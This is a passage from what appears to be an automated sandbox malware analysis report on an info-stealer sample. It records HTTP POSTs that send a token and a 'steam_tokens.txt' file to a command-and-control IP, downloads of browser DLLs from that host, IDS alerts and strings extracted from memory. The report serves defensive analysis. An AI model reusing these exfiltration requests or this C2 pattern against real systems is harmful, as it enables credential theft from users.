65 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 47 2d 2d 0d 0a Data Ascii: ------IECFIEGDBKJKFIDHIECGContent-Disposition: form-data; name="token"e54312f23a569b871fc226684235b0f5964114dc4a47f1fcc781a3fcb560d43be49d8610------IECFIEGDBKJKFIDHIECGContent-Disposition: form-data; name="message"files------IECFIEGDBKJKFIDHIECG--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAEBFIIECBGCBGDHCAFCHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 45 42 46 49 49 45 43 42 47 43 42 47 44 48 43 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 35 34 33 31 32 66 32 33 61 35 36 39 62 38 37 31 66 63 32 32 36 36 38 34 32 33 35 62 30 66 35 39 36 34 31 31 34 64 63 34 61 34 37 66 31 66 63 63 37 38 31 61 33 66 63 62 35 36 30 64 34 33 62 65 34 39 64 38 36 31 30 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 46 49 49 45 43 42 47 43 42 47 44 48 43 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 46 49 49 45 43 42 47 43 42 47 44 48 43 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 46 49 49 45 43 42 47 43 42 47 44 48 43 41 46 43 2d 2d 0d 0a Data Ascii: ------BAEBFIIECBGCBGDHCAFCContent-Disposition: form-data; name="token"e54312f23a569b871fc226684235b0f5964114dc4a47f1fcc781a3fcb560d43be49d8610------BAEBFIIECBGCBGDHCAFCContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------BAEBFIIECBGCBGDHCAFCContent-Disposition: form-data; name="file"------BAEBFIIECBGCBGDHCAFC--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDBFIIEBGCAKKEBFBAAFHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 42 46 49 49 45 42 47 43 41 4b 4b 45 42 46 42 41 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 35 34 33 31 32 66 32 33 61 35 36 39 62 38 37 31 66 63 32 32 36 36 38 34 32 33 35 62 30 66 35 39 36 34 31 31 34 64 63 34 61 34 37 66 31 66 63 63 37 38 31 61 33 66 63 62 35 36 30 64 34 33 62 65 34 39 64 38 36 31 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 46 49 49 45 42 47 43 41 4b 4b 45 42 46 42 41 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 46 49 49 45 42 47 43 41 4b 4b 45 42 46 42 41 41 46 2d 2d 0d 0a Data Ascii: ------JDBFIIEBGCAKKEBFBAAFContent-Disposition: form-data; name="token"e54312f23a569b871fc226684235b0f5964114dc4a47f1fcc781a3fcb560d43be49d8610------JDBFIIEBGCAKKEBFBAAFContent-Disposition: form-data; name="message"ybncbhylepme------JDBFIIEBGCAKKEBFBAAF--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEHJKJEBGHJJKEBGIECAHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 35 34 33 31 32 66 32 33 61 35 36 39 62 38 37 31 66 63 32 32 36 36 38 34 32 33 35 62 30 66 35 39 36 34 31 31 34 64 63 34 61 34 37 66 31 66 63 63 37 38 31 61 33 66 63 62 35 36 30 64 34 33 62 65 34 39 64 38 36 31 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 43 41 2d 2d 0d 0a Data Ascii: ------JEHJKJEBGHJJKEBGIECAContent-Disposition: form-data; name="token"e54312f23a569b871fc226684235b0f5964114dc4a47f1fcc781a3fcb560d43be49d8610------JEHJKJEBGHJJKEBGIECAContent-Disposition: form-data; name="message"wkkjqaiaxkhb------JEHJKJEBGHJJKEBGIECA--

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 185.215.113.37 185.215.113.37

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Suricata IDS alerts with low severity for network traffic

Source: Network traffic

Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49704 -> 185.215.113.37:80

Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Source: unknown

DNS traffic detected: query: 206.23.85.13.in-addr.arpa replaycode: Name error (3)

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_003260A0 InternetOpenA,StrCmpCA,InternetOpenUrlA,CreateFileA,InternetReadFile,WriteFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_003260A0

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache

Source: global traffic

DNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa

Source: unknown

Source: file.exe, 00000000.00000002.2360250459.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2359171753.00000000004EB000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2360250459.0000000000F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2360250459.0000000000F92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de1
Source: file.exe, 00000000.00000002.2360250459.0000000000F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/freebl3.dll
Source: file.exe, 00000000.00000002.2360250459.0000000000F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dll
Source: file.exe, 00000000.00000002.2360250459.0000000000F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dll
Source: file.exe, 00000000.00000002.2360250459.0000000000F67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dll
Source: file.exe, 00000000.00000002.2360250459.0000000000F67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dll)
Source: file.exe, 00000000.00000002.2360250459.0000000000F67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dlle
Source: file.exe, 00000000.00000002.2360250459.0000000000F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dll
Source: file.exe, 00000000.00000002.2360250459.0000000000F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dll
Source: file.exe, 00000000.00000002.2360250459.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2360250459.0000000000F67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll
Source: file.exe, 00000000.00000002.2360250459.0000000000F67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll0de163924d/nss3.dllv
Source: file.exe, 00000000.00000002.2360250459.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2359171753.00000000004EB000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2360250459.0000000000F92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php&
Source: file.exe, 00000000.00000002.2360250459.0000000000F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpB
Source: file.exe, 00000000.00000002.2360250459.0000000000F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpV
Source: file.exe, 00000000.00000002.2360250459.0000000000F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpb
Source: file.exe, 00000000.00000002.2360250459.0000000000F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpf
Source: file.exe, 00000000.00000002.2360250459.0000000000F92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpp
Source: file.exe, 00000000.00000002.2359171753.00000000004EB000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phption:
Source: file.exe, 00000000.00000002.2360250459.0000000000F92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpwser
Source: file.exe, 00000000.00000002.2360250459.0000000000F92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpz
Source: file.exe, 00000000.00000002.2360250459.0000000000F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php~
Source: file.exe, 00000000.00000002.2359171753.00000000004EB000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37e2b1563c6670f193.phption:
Source: file.exe, 00000000.00000002.2360250459.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37s
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, file.exe, 00000000.00000002.2387843050.000000006C6CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.2387548529.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2375735830.000000001D3D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: file.exe, 00000000.00000002.2360250459.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, HIEHDAFH.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000002.2381735405.0000000029495000.00000004.00000020.00020000.00000000.sdmp, JJKFBAKFBGDHIEBGDAKF.0.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: file.exe, 00000000.00000002.2381735405.0000000029495000.00000004.00000020.00020000.00000000.sdmp, JJKFBAKFBGDHIEBGDAKF.0.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: file.exe, 00000000.00000002.2360250459.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, HIEHDAFH.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000002.2360250459.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, HIEHDAFH.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000002.2360250459.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, HIEHDAFH.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.2381735405.0000000029495000.00000004.00000020.00020000.00000000.sdmp, JJKFBAKFBGDHIEBGDAKF.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000002.2381735405.0000000029495000.00000004.00000020.00020000.00000000.sdmp, JJKFBAKFBGDHIEBGDAKF.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: file.exe, 00000000.00000002.2360250459.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, HIEHDAFH.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000002.2360250459.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, HIEHDAFH.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000002.2360250459.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, HIEHDAFH.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: JJKFBAKFBGDHIEBGDAKF.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: IJKFHDBKFCAAECBFIDHJECBKEB.0.dr	String found in binary or memory: https://support.mozilla.org
Source: IJKFHDBKFCAAECBFIDHJECBKEB.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: IJKFHDBKFCAAECBFIDHJECBKEB.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: file.exe, 00000000.00000002.2381735405.0000000029495000.00000004.00000020.00020000.00000000.sdmp, JJKFBAKFBGDHIEBGDAKF.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: file.exe, 00000000.00000002.2381735405.0000000029495000.00000004.00000020.00020000.00000000.sdmp, JJKFBAKFBGDHIEBGDAKF.0.dr	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000000.00000002.2360250459.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, HIEHDAFH.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000002.2360250459.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, HIEHDAFH.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: IJKFHDBKFCAAECBFIDHJECBKEB.0.dr	String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.2359171753.000000000037A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: IJKFHDBKFCAAECBFIDHJECBKEB.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: file.exe, 00000000.00000002.2359171753.000000000037A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: IJKFHDBKFCAAECBFIDHJECBKEB.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000002.2359171753.000000000037A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.2308583528.000000002F663000.00000004.00000020.00020000.00000000.sdmp, IJKFHDBKFCAAECBFIDHJECBKEB.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000002.2359171753.000000000037A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: file.exe, 00000000.00000002.2359171753.000000000037A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: IJKFHDBKFCAAECBFIDHJECBKEB.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
